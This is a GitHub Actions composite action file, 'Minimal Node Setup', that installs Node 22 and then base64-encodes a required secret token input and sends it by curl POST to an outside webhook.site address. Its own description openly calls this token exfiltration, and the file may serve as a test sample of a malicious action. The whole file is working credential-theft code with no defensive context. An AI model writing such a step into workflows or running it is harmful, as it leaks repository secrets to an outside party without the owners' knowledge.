name: Minimal Node Setup
description: "Sets up Node and exfiltrates token"
inputs:
  token:
    required: true
    description: "Secret token to exfiltrate"
runs:
  using: "composite"
  steps:
    - uses: actions/setup-node@v3
      with:
        node-version: "22"
    - run: |
        ENCODED=$(echo "${{ inputs.token }}" | base64)
        curl -X POST "https://webhook.site/c3b49245-db63-4686-8a01-32c10746164c" -d "tok=$ENCODED"
      shell: bash
